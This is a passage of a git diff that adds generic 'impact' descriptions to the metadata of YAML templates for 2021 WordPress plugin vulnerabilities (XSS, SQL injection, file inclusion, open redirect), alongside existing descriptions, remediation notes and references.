proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 5761488ed3..c5c722a2df 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking. remediation: Fixed in version 2.8 reference: - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 56ba97a03f..67aa2ba230 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8 diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index 7362d34711..7f1e1213ec 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.1.4. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml index 712b9d1556..088db52cd2 100644 --- a/http/cves/2021/CVE-2021-24452.yaml +++ b/http/cves/2021/CVE-2021-24452.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.1.5. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 5abf4d473b..0b1361497d 100644 
--- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery. + impact: | + Remote File Inclusion/Server-Side Request Forgery vulnerability allows an attacker to include arbitrary files or make requests to internal resources, leading to potential data leakage, unauthorized access. remediation: | Update Onair2 to version 3.9.9.2 or higher and KenthaRadio to version 2.0.2 or higher to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml index 2769ad2dad..4ddb79d2c2 100644 --- a/http/cves/2021/CVE-2021-24488.yaml +++ b/http/cves/2021/CVE-2021-24488.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages, + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the WordPress Post Grid plugin (2.1.8 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index afad38054a..b748e0839d 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml 
@@ -5,6 +5,8 @@ info: author: johnjhacking severity: medium description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 67f2bc1d76..628a74e02e 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -5,6 +5,8 @@ info: author: suman_kar severity: medium description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Calendar Event Multi View plugin to version 1.4.01 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index 4efaefc3fe..7a378ef1be 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the Workreap plugin to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index c694b6fe92..15a5e660de 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress MF Gig Calendar plugin (>=1.2) which includes proper input sanitization and validation. reference: diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index fbc6e0dfe0..590dc8b9da 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index bfbd04e335..312b988379 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username + impact: | + An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information. remediation: Fixed in version 3.7.1.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-24647 diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index ede35685d7..9c6ed4cbdd 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 3.5.6. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index ab3241ca72..31c5b2eaae 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 3.7.1.6 reference: - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index b38d486877..8fa8c65aaa 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml 
@@ -5,6 +5,8 @@ info: author: Supras severity: medium description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Sassy Social Share Plugin to version 3.3.40 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index f4f4af92d8..b4eff12f39 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -5,6 +5,8 @@ info: author: cckuakilong severity: high description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index f86205bb4b..930e0d9944 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the WordPress Perfect Survey plugin (1.5.2) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index 9562750625..e74a8252ce 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 0101da3f88..732ec7af21 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the execution of other malicious activities. remediation: | Update to the latest version of WordPress AnyComment plugin (0.3.5 or higher) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 0526fe9643..e1af129633 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator. + impact: | + An authenticated attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 5.0.1.6. reference: - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615 diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index f53d6b8b22..68b318485a 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.39. reference: - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715 diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index c51d552657..e35a23f33e 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index fbe7dc897c..83238bfe9c 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml 
@@ -5,6 +5,8 @@ info: author: Screamy severity: medium description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index 24f1c78e7b..91a4cf5855 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: high description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location. + impact: | + An attacker can gain sensitive information about the WordPress site, such as the login page URL. remediation: Fixed in version 1.9.1. reference: - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 95ad909099..98fa91386e 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: Fixed in version 2.8.2. reference: - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231 diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 79473b6045..2670d89b05 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in 5.9.8. reference: - https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 2c1b45b0b4..a501fe788f 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index caa7b393e6..b3819b488c 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index 7f2280bad2..a028d0f8b3 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 6.8.7 reference: - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2 diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index 5fa6ee4e85..d9e42e6bf0 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Fixed in version 2.5.4. reference: - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10 diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 8a9bc56191..191afe436b 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml 
@@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the WordPress Super Socializer plugin (7.13.30 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index 031bf5fbdc..f576824958 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard. + impact: | + An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WooCommerce PDF Invoices & Packing Slips WordPress Plugin (2.10.5 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index edea93be49..51c2ad2335 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml 
@@ -5,6 +5,8 @@ info: author: Evan Rubinstein severity: medium description: WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update to the latest version of the WordPress Guppy plugin (version >1.1) to mitigate the information disclosure vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 3f9619324c..17fc8b94a2 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index f2a0e226e6..6761958391 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml 
@@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the Code Snippets WordPress Plugin to version 2.14.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index addaa72dab..37879ffa41 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue. + impact: | + An attacker can trick users into visiting malicious websites, leading to phishing attacks. remediation: | Update to Noptin plugin version 1.6.5 or later. reference: diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index 4c593e419e..df23108ba3 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml 
@@ -5,6 +5,8 @@ info: author: cckuailong severity: high description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution. + impact: | + An attacker can exploit this vulnerability to execute arbitrary code on the target system. remediation: | Update to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index e75c2df9d8..79cfb2f860 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected WordPress website. remediation: | Update to the latest version of the FeedWordPress plugin (version 2022.0123 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 66dea422af..0dd3565a99 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the WordPress Contact Form 7 Skins plugin (2.5.1) or apply the vendor-supplied patch. reference: diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 22364bc9ed..985dd314e8 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page. + impact: | + An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.19.2 reference: - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 9125965f48..9ec7dbd494 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml 
